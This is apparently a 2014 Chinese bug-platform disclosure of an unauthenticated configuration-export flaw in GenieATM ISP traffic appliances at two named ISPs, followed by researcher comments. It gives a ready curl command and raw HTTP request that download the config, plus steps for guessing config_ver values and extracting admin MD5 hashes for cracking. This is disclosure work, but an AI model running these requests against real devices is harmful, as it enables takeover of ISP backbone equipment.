GenieATM ISP存在非授权导出配置文件漏洞，获得设备管理权限后可以影响省骨干网络

测试版本GenieATM ISP MPLS version: 5.6存在非授权导出系统配置漏洞，且配置文件内包含管理员帐号和密码，虽然MD5加密，但是在测试的两个案例里面均可在CMD5进行查询。

案例1：沈阳移动

**.**.**.**/index.html

案例2：浙江电信

**.**.**.**/index.html

获取配置文件

方法A：

curl "**.**.**.**/atm_loader_info?sno=71640642&info_type=DownloadConfig&config_ver=112"

方法B：

GET /atm_loader_info?sno=71640642&info_type=DownloadConfig&config_ver=112 HTTP/1.1
 Host: **.**.**.**
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140903 Firefox/24.0 Iceweasel/24.8.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: **.**.**.**/atm_system_configuration
 Cookie: PHPSESSID=77c698502f3786cf1169a65d7c2a5f1e
 Connection: keep-alive

config_ver=112是该系列设备当前配置编号，是数字，需要猜测config_ver=什么！例如100或者更大的数字

快速查找密码部分，搜索

conf_user_info

cmd5解密沈阳移动admin用户，config_ver=112

*****d5a4ed421e8de1f1816912.png*****

cmd5解密浙江电信jerry用户，config_ver=922

*****fdce8bf9067cdcf91ddb8e.png*****

如果不能修补漏洞，建议将后台进行隐藏，限制访问地址等！

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-11-05 10:24

厂商回复：

1. 2014-11-01 10:10 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   GenieATM ISP存在非授权导出配置文件漏洞，获得设备管理权限后可以影响省骨干网络

   O(∩_∩)O哈哈~ “该类设备一般不会轻易暴露管理地址” 我记得某人说过... 互联网上好多好多好多

   1#回复此人

2. 2014-11-01 10:35 | 10457793 ( 普通白帽子 | Rank:1057 漏洞数:169 | You are on my list!)

   0

   @zeracker 某人是谁 哈哈 不经意间发现的 以脚本小子的技能测试了一下 应该算是国家基础设置了 应该好好保护 估计早有人利用该设备进行骨干网络流量分析了

   2#回复此人

3. 2014-11-01 12:09 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   0

   @10457793 是呀 @不良小狼

   3#回复此人

4. 2014-11-01 22:01 | 10457793 ( 普通白帽子 | Rank:1057 漏洞数:169 | You are on my list!)

   0

   @疯狗 能不能帮忙审核下我重新编辑添加的案例

   4#回复此人